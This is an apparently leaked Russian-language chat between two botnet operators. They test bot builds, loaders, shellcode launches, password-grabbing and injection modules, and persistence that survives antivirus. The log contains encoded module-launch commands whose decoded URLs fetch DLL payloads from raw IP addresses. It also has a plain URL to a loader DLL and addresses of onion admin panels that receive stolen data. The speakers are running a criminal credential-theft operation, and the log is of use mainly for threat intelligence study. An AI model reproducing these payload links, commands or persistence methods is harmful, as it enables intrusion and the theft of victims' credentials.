[21.09.21 15:12:07] cesar:		отходил, сорри
[21.09.21 15:12:11] cesar:		можем залить
[21.09.21 15:12:30] cesar:		10 мин
[21.09.21 15:13:20] angelo:		я сам оттойду
[21.09.21 15:13:22] angelo:		15 минут
[21.09.21 15:39:03] cesar:		AAAAAGkiOc/+q6e4VqIhD6cFrKu8nHRq8bbA2CyiZo7fD5HdJAAAAGgAdAB0AHAAOgAvAC8ANQAuADEAOAAxAC4AOAAwAC4AMQA1ADUALwBpAG0AYQBnAGUAcwAvAG0AbABiADYANAAuAGQAbABsALc1JlP6DcQcNbzEE2lV+jecQ+hdjdIeMFePvXS7U7YBoCkraaeOo0IeXcVa47ve7UkvCe1kldvZx8PZVmUCzDLbTWS3uZ1hJ6ovaPY2PUxQUZFIfh38tS09pMHo59gjog==
[22.09.21 12:02:02] angelo:		привет !
[22.09.21 12:02:03] angelo:		скажи
[22.09.21 12:02:09] angelo:		а может загрузиться два модуля ?
[22.09.21 12:02:13] angelo:		одновременно
[22.09.21 12:02:52] cesar:		привет
[22.09.21 12:03:22] cesar:		может, если допустим ав убили бот, а он запустился еще раз и запустил еще раз модуль
[22.09.21 12:03:49] angelo:		а если ты запустил модуль а потом прошла автозагрузка модуля ?
[22.09.21 12:05:22] cesar:		2 не запустится
[22.09.21 12:05:29] cesar:		всегда один выгрузится
[22.09.21 12:05:33] angelo:		хм
[22.09.21 12:05:34] angelo:		ок
[22.09.21 12:05:36] angelo:		спасибо
[22.09.21 16:54:29] angelo:		привет !
[22.09.21 16:54:32] angelo:		ты нужен
[22.09.21 16:54:33] angelo:		как вода
[22.09.21 16:54:36] angelo:		и воздух
[22.09.21 17:13:09] cesar:		чтож такое?
[22.09.21 17:13:13] cesar:		привет
[22.09.21 17:13:46] angelo:		что ж такое )))
[22.09.21 17:13:52] angelo:		да вроде норм пока  )
[22.09.21 17:13:59] angelo:		сорян
[22.09.21 17:14:16] cesar:		окей )
[22.09.21 17:14:36] angelo:		"фартануло" подумал Цезарь
[22.09.21 17:14:37] angelo:		=)
[22.09.21 17:14:52] cesar:		именно так )))
[23.09.21 11:27:49] angelo:		привет !
[23.09.21 11:27:57] angelo:		всё таки надо залить 32 не логированный
[23.09.21 11:37:24] angelo:		сможешь посмотреть бота ?
[23.09.21 11:47:46] angelo:		312908 7 	0 	10 Start failed
[23.09.21 11:47:48] angelo:		никак ((
[23.09.21 12:25:58] cesar:		привет
[23.09.21 12:42:06] angelo:		привеет
[23.09.21 13:13:43] cesar:		так а в чем беда с ботом?
[23.09.21 13:14:35] angelo:		не загружается наш вчерашний спамбот32
[23.09.21 13:14:54] angelo:		можешь не логированный залить 32 ?
[23.09.21 13:15:43] cesar:		а линк рабочий?
[23.09.21 13:16:01] angelo:		а я не знаю как проверить
[23.09.21 13:16:07] angelo:		ты мне вчера кидал вот так
[23.09.21 13:16:15] angelo:		AAAAAPwfGAnmrfLr32VYFV/MkBYppG5SzVp57FnguaKyXjRxJAAAAGgAdAB0AHAAOgAvAC8ANQAuADEAOAAxAC4AOAAwAC4AMQA1ADUALwBpAG0AYQBnAGUAcwAvAG0AbABiADMAMgAuAGQAbABsAC7sFf7MqV17WtPDdYsZ9mNTzMT+Qp+limVb31YlmDvgGaFayQdRkUNW006fP/e/sTC8Exqb+D+vNeH67YrkviZT3p/YrtLglxBnnhkRbcUK1k+Sx30JeNzEiOalMOxDUA==
[23.09.21 13:16:32] angelo:		в душе не знаю как посмотреть (
[23.09.21 13:16:33] cesar:		сек, перешифрую
[23.09.21 13:16:39] angelo:		погоди
[23.09.21 13:16:48] angelo:		давай зальем не логированный
[23.09.21 13:17:05] cesar:		AAAAAPwfGAnmrfLr32VYFV/MkBYppG5SzVp57FnguaKyXjRxJAAAAGgAdAB0AHAAOgAvAC8ANQAuADEAOAAxAC4AOAAwAC4AMQA1ADUALwBpAG0AYQBnAGUAcwAvAG0AbABiADMAMgAuAGQAbABsAIIIpy8f2f+wFjlP84g9HPcQ38TrE8ab7+hYMJinXQUVv671uGVz7RsMECHOopcF/uVse8hwQqB60y3SFGcR22gj4Bm9ZlYsYxY7oUcbjOjp9yb9JMF5v0jTgS71hM9UKw==
[23.09.21 13:17:13] cesar:		проверь вначале с логами
[23.09.21 13:17:52] angelo:		ок
[23.09.21 14:06:01] angelo:		10 Start failed
[23.09.21 14:06:02] angelo:		никак
[23.09.21 14:11:26] cesar:		сейчас проверю
[23.09.21 14:13:20] angelo:		https://cceqv5ulg6fc44budf3a4s5kkrhprk5okjmdtgmo6xevj2p2sxnkh3id.onion/log/18845960
[23.09.21 14:25:47] cesar:		что то не могу админку загрузить
[23.09.21 14:25:54] cesar:		работает у тебя?
[23.09.21 14:26:02] angelo:		работает
[23.09.21 14:26:06] angelo:		но сегодня странно
[23.09.21 14:26:08] angelo:		с паузами
[23.09.21 16:26:40] angelo:		слушай, а почему модули подгружаются один за одним ?
[23.09.21 16:26:50] angelo:		injectDll 	2021-09-23 16:23:42.873404 	start 	Success 	
pwgrabb 	2021-09-23 16:23:19.81257 	sTart 	Success 	
pwgrabc 	2021-09-23 16:22:51.968653 	sTart 	Success 	
importDll 	2021-09-23 16:22:27.692118 	getdata 		
importDll 	2021-09-23 16:22:03.073969 	getdata 		
importDll 	2021-09-23 16:10:04.989294 	getdata 		
importDll 	2021-09-23 16:04:59.69637 	getdata 		
importDll 	2021-09-23 16:04:34.09108 	getdata 		
networkDll 	2021-09-23 15:56:01.925375 	start 		
networkDll 	2021-09-23 15:55:42.772934 	start
[23.09.21 16:26:54] angelo:		толпой
[23.09.21 16:26:58] angelo:		тот же импорт
[23.09.21 16:29:48] cesar:		кнопки в админке жмут наверное
[23.09.21 16:30:18] cesar:		по поводу старта на 32битном боте пока разбираюсь, похоже на косяк в боте
[23.09.21 16:30:34] angelo:		понял, ждем
[23.09.21 16:30:37] angelo:		отпишу Базилю
[23.09.21 16:31:52] angelo:		слушай а скажи что такое Деро ?
[23.09.21 16:33:29] cesar:		это бекенд на сервере, который принимает данные от модулей, прокладки dpost на него как раз указывают
[23.09.21 16:33:59] angelo:		ну то есть сервак
[23.09.21 16:34:10] angelo:		куда сливаютс данные
[23.09.21 16:34:11] angelo:		понял
[23.09.21 16:38:18] angelo:		сделай бота на kwwka...
[23.09.21 16:38:20] angelo:		тестовый
[23.09.21 16:38:27] angelo:		Деф просит
[23.09.21 16:39:08] cesar:		ок
[23.09.21 16:39:26] angelo:		какой петух клюнул Дефа ?)
[23.09.21 16:41:30] cesar:		залил на панель
[23.09.21 16:41:37] cesar:		ttstt.bin
[23.09.21 16:41:47] cesar:		только длл не бери, она на 3тью
[23.09.21 16:41:47] angelo:		окай
[23.09.21 16:41:50] angelo:		спасибо
[23.09.21 16:42:33] cesar:		кто клюнул не знаю, долго не можем решить проблему, видимо его ебут слегка
[23.09.21 16:51:17] angelo:		а какую ты группу дал ?
[23.09.21 16:51:27] angelo:		какую искать в kwwka7
[23.09.21 16:51:47] angelo:		у меня там tst* только
[23.09.21 16:52:03] cesar:		ttstt
[23.09.21 16:52:13] angelo:		понял
[23.09.21 16:52:17] angelo:		к Дефу за доступом
[23.09.21 16:52:32] cesar:		у тебя только tst* ?
[23.09.21 16:52:43] angelo:		ага
[23.09.21 16:52:49] angelo:		в списке шрупп
[23.09.21 16:52:50] cesar:		давай залью tst21
[23.09.21 16:52:58] angelo:		да уже поздно )
[23.09.21 16:53:02] angelo:		написал Дефу
[23.09.21 16:53:13] angelo:		давай
[23.09.21 16:53:16] angelo:		)
[23.09.21 16:53:19] angelo:		а то буду ждать его
[23.09.21 16:53:20] cesar:		pfrbye ctqxfc
[23.09.21 16:53:23] cesar:		залью скоро
[23.09.21 16:53:53] cesar:		залито
[23.09.21 16:54:00] angelo:		хера
[23.09.21 16:54:05] angelo:		всем бы так "скоро"
[27.09.21 17:43:31] angelo:		привет бро !
[27.09.21 17:43:40] angelo:		просто напомнить
[27.09.21 17:43:55] angelo:		не забудь про трика и 32 битную ось
[27.09.21 17:44:20] cesar:		привет, помню
[27.09.21 17:44:30] cesar:		пока еще не решил проблему
[27.09.21 17:44:33] cesar:		но скоро
[27.09.21 17:45:05] angelo:		окай, я просто напомнить !!)
[28.09.21 14:46:21] angelo:		привет бро ! просто интересуюсь, basil спрашивает когда сможем спамбот прокрутить 32 триком....
[28.09.21 14:48:33] cesar:		привет, завтра с утра прокрутим
[28.09.21 14:48:40] angelo:		окай
[28.09.21 14:48:43] angelo:		спс
[30.09.21 15:20:33] angelo:		тут ?
[30.09.21 15:20:43] angelo:		там адама совсем покусали
[30.09.21 15:20:51] angelo:		не понмю какой я у тебя последний бот просил
[30.09.21 15:21:03] angelo:		в какие админки стучит
[30.09.21 15:36:42] cesar:		на 3тью?
[30.09.21 15:36:49] angelo:		нашел
[30.09.21 15:36:58] angelo:		последний что ты мне кидал на 21 группу
[30.09.21 15:37:19] cesar:		залит tst1 на панель
[30.09.21 15:37:36] cesar:		и на нем можно протетсировать запуск 45 команды
[30.09.21 15:37:47] angelo:		на 32 ?
[30.09.21 15:37:51] cesar:		да
[30.09.21 15:40:12] cesar:		только там линк уже протух, напиши скину новый, когда будешь готов запускать
[30.09.21 15:40:33] angelo:		я уже тот бот запустил
[30.09.21 15:40:39] angelo:		на трех тачках
[30.09.21 15:40:50] angelo:		стучит в kwwka7
[30.09.21 15:42:01] cesar:		какой тот?
[30.09.21 15:42:12] angelo:		тот на 21 группу
[30.09.21 15:42:19] angelo:		пару дней назад кидал мне
[30.09.21 15:42:21] cesar:		нет, он уже старый
[30.09.21 15:42:24] angelo:		когда Адам просил
[30.09.21 15:42:26] cesar:		не пойдет
[30.09.21 15:42:30] angelo:		бляха
[30.09.21 15:42:39] cesar:		именно на вторую группу нужен для теста?
[30.09.21 15:43:05] angelo:		нужно на админку зевса
[30.09.21 15:44:14] cesar:		ок, сейчас закину на панель
[30.09.21 15:44:36] angelo:		давай
[30.09.21 15:48:27] cesar:		залит
[30.09.21 15:48:33] angelo:		ок
[30.09.21 16:20:54] angelo:		tst21 этот ж ?
[30.09.21 16:44:18] angelo:		у меня трик на 7 выдал ошибку
[30.09.21 16:44:45] angelo:		запустил а через какое-то время вылезло окно что приложение будет закрыто (
[30.09.21 16:48:27] cesar:		это при запуске бота?
[30.09.21 16:48:32] angelo:		ага
[30.09.21 16:48:37] cesar:		7 64?
[30.09.21 16:48:37] angelo:		могу грешить
[30.09.21 16:48:42] angelo:		ага
[30.09.21 16:48:43] cesar:		какой файл запускал?
[30.09.21 16:48:52] angelo:		tst21
[30.09.21 16:49:03] cesar:		ок, проверю
[30.09.21 16:49:04] angelo:		на других норм
[30.09.21 16:59:33] cesar:		пока работает, ошибки не вижу
[30.09.21 16:59:40] cesar:		а как долго отработал бот?
[30.09.21 16:59:48] cesar:		сразу после запуска?
[30.09.21 16:59:48] angelo:		прям минут 5
[30.09.21 16:59:52] angelo:		и вылезла
[30.09.21 16:59:59] angelo:		после запуска 5 мин
[30.09.21 17:00:02] cesar:		а скинь линк на этот бот
[30.09.21 17:00:23] angelo:		ща посмотрю отсучал ли он вообще
[30.09.21 17:00:55] angelo:		смешно но он был в онлайне
[30.09.21 17:00:55] angelo:		https://kwwka7ark3ynr7k7.onion/log/17422786
[30.09.21 17:00:58] angelo:		блин
[30.09.21 17:01:03] angelo:		а я вырубил уже тачку
[30.09.21 17:01:41] cesar:		может модуль какой то упал
[30.09.21 17:01:49] cesar:		ок, посмотрю по логу
[30.09.21 17:02:00] angelo:		ну я хз, просто вижу чего - сразу пишу
[30.09.21 17:02:03] angelo:		мало ли
[30.09.21 17:02:18] angelo:		я проклят находить неведомые другим юзерам баги ))
[30.09.21 17:02:39] cesar:		да, отлично, ты несчастный случай )))
[30.09.21 17:02:45] cesar:		пиши обязательно
[30.09.21 17:02:52] angelo:		))) окай
[01.11.21 14:16:18] angelo:		привет
[09.11.21 09:32:20] cesar:		1
[09.11.21 09:32:43] cesar:		отр врубился?
[09.11.21 09:32:50] cesar:		похоже нет
[09.11.21 09:32:57] angelo:		вчера запускал шелкодом трик с бк
[09.11.21 09:32:57] angelo:		после ребута машин, боты сдохли
[09.11.21 09:32:57] angelo:		слушай
[09.11.21 09:32:57] angelo:		что делать ?!
[09.11.21 09:32:57] angelo:		да
[09.11.21 09:33:20] cesar:		1
[09.11.21 09:33:31] cesar:		вроде бы норм
[09.11.21 09:33:38] cesar:		повтори что писал
[09.11.21 09:33:39] angelo:		короче
[09.11.21 09:33:51] angelo:		вчера запускал с бк трика шелкодом
[09.11.21 09:33:58] angelo:		группа zev9
[09.11.21 09:34:24] angelo:		На одном боте был двойной запуск нетворка
На втором боте   62 	pwgrabb delete
После ребута умерли бота и в бк и в трике
[09.11.21 09:34:56] cesar:		не понял
[09.11.21 09:35:08] cesar:		т.е. после ребута не запустился бк?
[09.11.21 09:35:25] cesar:		шел трика не прописывается
[09.11.21 09:35:35] cesar:		он чисто работает в процессе бк
[09.11.21 09:35:55] cesar:		после перезагрузки его нужно перезапускать и придет он с другим id
[09.11.21 09:36:04] angelo:		после ребута и там и там померли боты
[09.11.21 09:36:10] angelo:		после перегрузки машин
[09.11.21 09:36:45] cesar:		а когда запускается один бк? он после перезагрузки работает?
[09.11.21 09:37:04] angelo:		да
[09.11.21 09:37:08] angelo:		блин
[09.11.21 09:37:10] angelo:		вроде даааа
[09.11.21 09:37:13] angelo:		поздно делал
[09.11.21 09:37:20] cesar:		шел никак не может повлиять на это
[09.11.21 09:37:21] angelo:		в голове ветер был
[09.11.21 09:37:36] angelo:		но трик мертвый был точно
[09.11.21 09:38:18] cesar:		смотри, это вариант шел трика, он без прописывания и сохранения на диск
[09.11.21 09:38:34] cesar:		он чисто работает в процессе бк и умирает вместе с бк
[09.11.21 09:38:54] cesar:		он нужен для запуска необходимых модулей
[09.11.21 09:39:18] cesar:		после перезагрузки или завершения бк, трика не будет
[09.11.21 09:39:40] cesar:		если он нужен, то нужно опять запускать так же шел через бк
[09.11.21 09:39:58] cesar:		надеюсь популярно объяснил?
[09.11.21 09:40:51] angelo:		ага
[09.11.21 09:40:51] angelo:		даже очень
[09.11.21 09:41:00] cesar:		смысл в том, что в этом случае трик не должен спалить бк
[09.11.21 09:41:04] angelo:		тогда че адам мозги ебет ?
[09.11.21 09:41:23] angelo:		у ребят траблы иного характера
[09.11.21 09:41:30] angelo:		они запускают дллку трика на бк
[09.11.21 09:41:38] angelo:		бк остаеться жиым а трик умирает
[09.11.21 09:41:46] cesar:		да, про эту проблему слышал
[09.11.21 09:41:59] angelo:		это основная проблема живучисти
[09.11.21 09:42:09] angelo:		нахер адам привязался к шеллу ?
[09.11.21 09:42:32] cesar:		почему там - не могу понять, у меня нет бк, просил пояснить и скинуть код как там идет запуск, пока не скинули
[09.11.21 09:43:01] angelo:		так, я сейчас проверю на своих
[09.11.21 09:43:05] cesar:		но странно, что он запускается и потом отваливается, похоже на детект
[09.11.21 09:43:05] angelo:		и к тебе потом ок ?
[09.11.21 09:43:10] angelo:		спрошу про код запуска с бк
[09.11.21 09:43:12] cesar:		ок
[09.11.21 09:43:49] angelo:		всё равно непонимаю, че адам к шеллу пристал если проблема с запуском длл... порой хер поймёшь его
[09.11.21 09:48:45] cesar:		шел нужно просто проверить, что он работает нормально в бк
[09.11.21 09:48:45] cesar:		что не палит его
[09.11.21 09:48:45] cesar:		что бк не умрет вместе с шелом трика
[09.11.21 09:48:56] cesar:		т.е. нужно запустить шел, позапускать нужные модули, возможно vnc3Dll
[09.11.21 09:49:06] cesar:		и пусть работает
[09.11.21 09:49:12] cesar:		4-8 часов
[09.11.21 09:49:37] cesar:		потом перезагрузить систему несколько раз
[09.11.21 10:32:16] angelo:		а почему не дать мне шелл с закрепом трика ?
[09.11.21 10:32:33] angelo:		им ж поди с закрепом нужен ?
[09.11.21 10:34:46] cesar:		бк закрепляется в системе
[09.11.21 10:35:04] cesar:		для чего палится и ставить туда еще и трика?
[09.11.21 10:35:32] cesar:		насколько я уточнял, в бк не хватает функционала, каких то модулей трика
[09.11.21 10:35:51] angelo:		понял тебя
[09.11.21 10:35:52] angelo:		про закреп
[09.11.21 10:36:50] angelo:		то есть мы хотим полностью перейти на запус с шела без закрепа тркиа
[09.11.21 10:38:32] cesar:		это самый безпалевный вариант
[09.11.21 11:49:45] angelo:		` 4-8 часов
потом перезагрузить систему несколько раз
`
[09.11.21 11:49:59] angelo:		а для чего ребутить если трик без закрепа ?
[09.11.21 11:56:49] cesar:		бк проверить
[09.11.21 11:59:17] angelo:		можешь посомтреть плиз
[09.11.21 11:59:17] angelo:		DESKTOP-52K69VQ_W10019043.5C975BA7B5377D179EF3F92D089984E9
[09.11.21 11:59:20] angelo:		живой или нет
[09.11.21 11:59:21] angelo:		в черной
[09.11.21 11:59:23] angelo:		непонимаю
[09.11.21 11:59:57] cesar:		сек
[09.11.21 12:00:03] cesar:		2ая админка?
[09.11.21 12:00:15] angelo:		/kwwka7
[09.11.21 12:02:21] cesar:		думаю качает модуль
[09.11.21 12:02:32] cesar:		прокладки на модули видимо не очень
[09.11.21 12:04:53] angelo:		то есть из-за прокладки на модуле помер трик ?
[09.11.21 12:15:54] angelo:		два бота
[09.11.21 12:15:59] angelo:		DESKTOP-0D7ULR6_W10019042.7B9B16218E34284D2F3991CDDC325A19
[09.11.21 12:16:05] angelo:		DESKTOP-52K69VQ_W10019043.5C975BA7B5377D179EF3F92D089984E9
[09.11.21 12:16:08] angelo:		один умер второй нет
[09.11.21 12:16:11] angelo:		надо понят ьпочему
[09.11.21 12:32:14] cesar:		принял
[09.11.21 14:06:23] angelo:		боты стали умерать бро
[09.11.21 14:06:25] angelo:		zev9
[10.11.21 13:58:24] cesar:		1
[10.11.21 13:58:43] cesar:		отр нрм
[10.11.21 13:58:51] angelo:		требовать от разработчика бота сборку с закреплением
проверить закрепление на живучесть
перенять опыт разработчиков бк по закреплению - например использовать BITS, а также методы отсюда

https://habr.com/ru/post/425177/
http://www.hexacorn.com/blog/2017/01/28/beyond-good-ol-run-key-all-parts/

подобрать методы закрепления с разрывом цепочки
сначала добиться живучести голого бота без модулей
тестировать на живучесть с модулями уже отдельным этапом
[10.11.21 13:58:55] angelo:		это написал Сильвер
[10.11.21 13:59:10] angelo:		типа Шелл лучше точно чем ддлку запускать
[10.11.21 13:59:12] cesar:		да, читал, будем заниматься
[10.11.21 13:59:23] angelo:		потом там уже новый трик какой-то
[10.11.21 13:59:31] cesar:		да, шел гораздо лучше
[10.11.21 13:59:34] angelo:		и дальше и дальше, и я уже запутался к хуям собачим
[10.11.21 13:59:50] cesar:		я читал
[10.11.21 14:00:06] cesar:		спасибо, ты свою работу сделал, если что буду писать
[10.11.21 14:00:34] angelo:		ок
[10.11.21 14:00:38] angelo:		я запустил три бота
[10.11.21 14:00:43] angelo:		2 в трике тусят норм
[10.11.21 14:00:49] angelo:		шелом пускал
[10.11.21 14:00:54] angelo:		уж не знаю нужно кому это или нет
[10.11.21 14:01:51] cesar:		пусть повисят, если машины не нужны
[10.11.21 14:02:07] cesar:		если нужны, то засеки сколько отработали и id скинь плиз
[10.11.21 14:02:24] cesar:		потом можно вырубать
[10.11.21 14:02:52] angelo:		у меня их уже больше 10 с вами стало ) над оуже хард менять, пуст ьвисят
[16.11.21 15:25:41] angelo:		привет
[16.11.21 15:31:09] angelo:		тут?
[16.11.21 15:32:00] cesar:		привет
[16.11.21 15:32:36] angelo:		отр
[16.11.21 15:32:41] cesar:		1
[16.11.21 15:32:48] cesar:		да, норм
[16.11.21 15:33:02] angelo:		у тебя работает
[16.11.21 15:33:10] angelo:		kwwka7
[16.11.21 15:33:10] angelo:		?
[16.11.21 15:33:26] cesar:		сек, проверю
[16.11.21 15:34:01] cesar:		нет, даже не находит такой урл
[16.11.21 15:34:09] angelo:		вот вот
[16.11.21 15:34:19] angelo:		у тебя есть бот на другую админку без автозапуска ?
[16.11.21 15:34:50] cesar:		сейчас поищу
[16.11.21 15:40:22] angelo:		кому по админке написать ? или сам ?
[16.11.21 15:42:11] cesar:		адаму
[16.11.21 15:42:14] cesar:		я тоже напишу
[16.11.21 15:46:24] cesar:		tst361 на панельке, криптованный, но лучше деф отключай
[16.11.21 15:46:51] angelo:		ты пока тут ?
[16.11.21 15:46:51] angelo:		спс
[16.11.21 15:46:58] angelo:		надо ддлку запустить...
[16.11.21 15:47:01] cesar:		залил и некриптованный
[16.11.21 15:47:04] angelo:		ну вот не запускал я триком их
[16.11.21 15:47:11] cesar:		ок, напишу как
[16.11.21 15:47:35] angelo:		найди описание = *для тугонького
[16.11.21 15:47:40] angelo:		=)
[16.11.21 15:49:51] cesar:		49 команда
[16.11.21 15:50:09] cesar:		```AAAAAFzf4NCoCw9Vdj8ZdMVHSGacxPVqGpabdXGFZB3rzgHgLAAAAGgAdAB0AHAAOgAvAC8AMQA5ADgALgA0ADYALgAxADkAOAAuADEAMgA4AC8ATABvAGEAZABlAHIAXwB6AHYAbwBfADkAMgAxADIANABfADEALgBkAGwAbABSJZssG6BbvSSWn3j2PFPvGd8FbneH5PvSOuOzsGrYZUIqHksniEK9pj7xz8RV4LB2huHZ0MHpIzoserOneGv2R8hDu/6rJ6CT/iDpkmQjm3l8cEm+LxK+wCBGad5HmLs= Q29udHJvbF9SdW5ETEw```
[16.11.21 15:50:17] cesar:		это как аргумент
[16.11.21 15:50:53] angelo:		погодь а куда дллку сувать ?
[16.11.21 15:51:55] cesar:		она уже засунута на линк
[16.11.21 15:52:03] cesar:		тебе же скидывал ее адам?
[16.11.21 15:52:17] cesar:		http://198.46.198.128/Loader_zvo_92124_1.dll
[16.11.21 15:52:20] cesar:		эта?
[16.11.21 15:52:20] angelo:		ага
[16.11.21 15:52:24] cesar:		ок
[16.11.21 15:52:31] angelo:		мож ты мне на судьбу погадаешь тоже ?)
[16.11.21 15:52:39] angelo:		всё знаешь наперед
[16.11.21 15:52:48] angelo:		а что это ?
[16.11.21 15:52:53] cesar:		он мне тоже скинул, тоже тестирую
[16.11.21 15:53:11] cesar:		по судьбе - все будет заебись!
[16.11.21 15:54:18] angelo:		спасибо дорогой )))
[16.11.21 15:54:24] cesar:		)
[16.11.21 16:00:50] angelo:		что-то долго не стучит
[16.11.21 16:00:55] angelo:		запустил вторую тачку на всяк
[16.11.21 16:03:28] angelo:		не стучат оба и крипт и не крипт
[16.11.21 16:04:22] cesar:		сек
[16.11.21 16:06:38] cesar:		https://cceqv5ulg6fc44budf3a4s5kkrhprk5okjmdtgmo6xevj2p2sxnkh3id.onion/log/23548966
[16.11.21 16:06:46] cesar:		твое?
[16.11.21 16:07:10] angelo:		да
[16.11.21 16:07:10] angelo:		тока стукнул
[16.11.21 16:07:12] angelo:		фига как долго
[16.11.21 16:07:15] angelo:		не привычно аж
[16.11.21 16:07:25] cesar:		прокладки так себе
[16.11.21 16:08:53] angelo:		тебе Деф сказал что за дллка ?
[16.11.21 16:08:56] angelo:		куда смотреть
[16.11.21 16:09:25] cesar:		а вот хрен его знает
[16.11.21 16:09:34] cesar:		пиши, пусть смотрит, может стукнет
[16.11.21 16:10:05] angelo:		Деф как всегда такой загадочный
[23.11.21 07:42:36] angelo:		привет !
[23.11.21 07:43:18] cesar:		привет
[23.11.21 07:44:08] angelo:		Франк дал задачу
[23.11.21 07:44:10] angelo:		го отр
[23.11.21 07:44:24] cesar:		1
[23.11.21 07:44:36] angelo:		нужны боты на две админки
[23.11.21 07:44:48] angelo:		на кваку ты жавал вроде
[23.11.21 07:45:00] angelo:		без автозагруза
[23.11.21 07:45:12] cesar:		запуск модулей через 61?
[23.11.21 07:45:26] angelo:		ага
[23.11.21 07:45:38] cesar:		ок, залью скоро
[23.11.21 07:45:59] angelo:		окай
[23.11.21 07:46:02] angelo:		спс бро 1
[23.11.21 07:46:04] angelo:		!
[23.11.21 08:07:37] cesar:		залиты tst261 и tst361
[23.11.21 08:08:54] angelo:		не вижу
[23.11.21 08:09:37] cesar:		повтори
[23.11.21 08:09:42] angelo:		тест
[23.11.21 08:09:48] cesar:		1
[23.11.21 08:10:06] angelo:		норм
[23.11.21 08:10:17] cesar:		залиты tst261 и tst361
[23.11.21 08:10:36] angelo:		спс !!!
[23.11.21 09:03:53] angelo:		а через что запукать ?
[23.11.21 09:04:01] angelo:		какая точка
[23.11.21 09:04:04] angelo:		напомни
[23.11.21 09:22:03] angelo:		kwwka7 работает ?
[23.11.21 11:12:24] angelo:		kwwka7 работает ?
[23.11.21 11:12:31] angelo:		и скажи запуск грабера
[23.11.21 11:12:32] angelo:		сейчас какой
[23.11.21 11:12:58] cesar:		сек
[23.11.21 11:13:22] cesar:		https://qdc6fwwomnmokmup3zz25k2coxwb2vss7zs3ox4656jjuv5mam6acgyd.onion/
[23.11.21 11:13:30] cesar:		это новый kwwka
[23.11.21 11:13:45] cesar:		по груберу не понял
[23.11.21 11:14:28] angelo:		pwgrabb start
pwgrabc start
[23.11.21 11:14:30] angelo:		они ?
[23.11.21 11:14:34] angelo:		не менялись ?
